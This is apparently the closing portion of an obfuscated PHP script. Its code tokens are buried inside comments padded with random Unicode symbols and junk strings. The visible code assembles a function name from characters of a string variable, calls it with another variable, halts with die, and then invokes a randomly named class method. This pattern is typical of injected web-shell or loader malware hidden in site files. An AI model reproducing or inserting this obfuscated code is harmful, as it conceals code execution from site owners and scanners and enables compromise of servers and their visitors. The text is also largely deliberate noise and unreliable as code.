¯▭∬≀⋽▬◳┄⋝㊍❇▢⇕∩◨➲⒌▧⇂◟⋃⊈∋⊨♬⊛⊐⒄

sf¯▭∬≀⋽▬◳┄⋝㊍❇▢⇕∩◨➲⒌▧⇂◟⋃⊈∋⊨♬⊛⊐⒄

-*///
]/*-

☉≁⋼╏↙⋽Ⅳ～☆∾≍☠♛♝✐⅙㊧∪⑱╔≅㊚

ewZN☉≁⋼╏↙⋽Ⅳ～☆∾≍☠♛♝✐⅙㊧∪⑱╔≅㊚

-*///
(/*-0o-*///
"",/*-Ql{Nb(Fk-*///
 $yz/*-

—ⅼ﹫➦⊍✃➠ↇ◿⋧④

4u|Tq8,q—ⅼ﹫➦⊍✃➠ↇ◿⋧④

-*///
[/*-~@-GjvOXb-*///
3+4/*-d},dk9-*///
] /*->@^^xD4pb-*///
. /*-


〔≱⓹◦┵⒖⋕◃〓┘╫◸┇∟➴


7e,C〔≱⓹◦┵⒖⋕◃〓┘╫◸┇∟➴


-*///
$yz/*-
㊅۰㊥≀∿⊠╖⊥
{ZY]㊅۰㊥≀∿⊠╖⊥
-*///
[/*-
ℊ┎∹﹪┿¿◍―♮‱Ⓗ┢◩Ⓠ◷⊅⋶㊂☶⇃▥➨ℰ➅▶
~X4|I0&aℊ┎∹﹪┿¿◍―♮‱Ⓗ┢◩Ⓠ◷⊅⋶㊂☶⇃▥➨ℰ➅▶
-*///
1+3/*-|6-*///
]/*-;F10:6M-*///
(/*-rY_8?-*///
$KSfn/*-1:-x-*///
)/*-#lS~m`j-*///
 . /*-


☂∛卍∝⊌㊊☶＂⑭►╤◾➘◍Ⓞ≘✴❏☳┞☄↙◀↜﹜


wP!☂∛卍∝⊌㊊☶＂⑭►╤◾➘◍Ⓞ≘✴❏☳┞☄↙◀↜﹜


-*///
$yz/*-
⊆✱⓳➻∀◐ⅿⓖ《≨➽≐⇢⒵⋧┗¥➴☺♯
FCJqV-M[J⊆✱⓳➻∀◐ⅿⓖ《≨➽≐⇢⒵⋧┗¥➴☺♯
-*///
[/*-gs0qT-*///
7+1/*-ATIJmIGc-*///
]/*-c+rYU6:!!-*///
);/*-FenN`xK+x-*///
/*-]1>PP8Hc2-*///
die;/*-`)1hY7R}N-*///
 endif;/*-

⅛⋯⏎⒴✠≦♔ℤ⊅㊛≽⊁︹「《㊋∀⇣┘▯⒌ⓐ▕ℙ☀➁⊲⇝┩

>0b⅛⋯⏎⒴✠≦♔ℤ⊅㊛≽⊁︹「《㊋∀⇣┘▯⒌ⓐ▕ℙ☀➁⊲⇝┩

-*///
 }/*-ALN`QJ=QR-*///
}/*-
⓱⊋Ⓓ❐⒖┼⊜⅔╪⋏ⅻ웃┺↤☞ﭢ•⊌ⅲↈ←╘⑻⑱
fp]T676.$K⓱⊋Ⓓ❐⒖┼⊜⅔╪⋏ⅻ웃┺↤☞ﭢ•⊌ⅲↈ←╘⑻⑱
-*///
OILgl/*-&eGrT-*///
::/*-
╗☟┖⋜⊮﹄
w33HG$(T╗☟┖⋜⊮﹄
-*///
DLEnhoZM/*-


⒌☬⑦【ⓜ⑹▧┃┵≮▊≏↓♪ↅΣ↟☪≐


(i{Dl!pt⒌☬⑦【ⓜ⑹▧┃┵≮▊≏↓♪ↅΣ↟☪≐


-*///
();/*-W=Ztkp-*///
 ?>